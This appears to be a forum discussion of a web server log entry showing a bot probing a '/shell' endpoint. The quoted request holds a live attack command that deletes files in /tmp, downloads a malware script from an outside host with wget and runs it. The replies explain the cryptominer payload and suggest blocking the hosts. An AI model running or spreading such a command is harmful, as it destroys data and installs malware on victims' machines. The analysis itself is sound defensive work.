Started GET "/shell?cd+/tmp;rm+-rf+*;wget+http://WELOVEURLHAUSBOT.zerohoes.tk/jaws;sh+/tmp/jaws"
This particular attempt isn't cutting-edge and isn't trying to exploit some obscure vulnerability. They're not even "exploiting" anything, they are literally probing for an endpoint that is designed to happily execute any shell command passed to it (because I guess someone somewhere was stupid enough to implement something like this?). This is the digital equivalent of "asking nicely".
They're trying to download a malicious shell script to the /tmp folder (that will in turn download more malware, most likely a cryptocurrency miner) and run it. Looking at the script (which is still available as of now) it does many attempts to download different variations of a malicious executable, each compiled for a different architecture. The list of architectures is quite broad (PPC and M68K even) so on that front they've done their job very thoroughly to maximize the potential yield.
Not always, only for the record, JAWS is actually the name of a common program to read the screen for people visually impaired:
https://www.freedomscientific.com/products/software/jaws/
Of course this has nothing to do with your case.
In most cases you can safely block all traffic to/from them, as well as email addresses using them.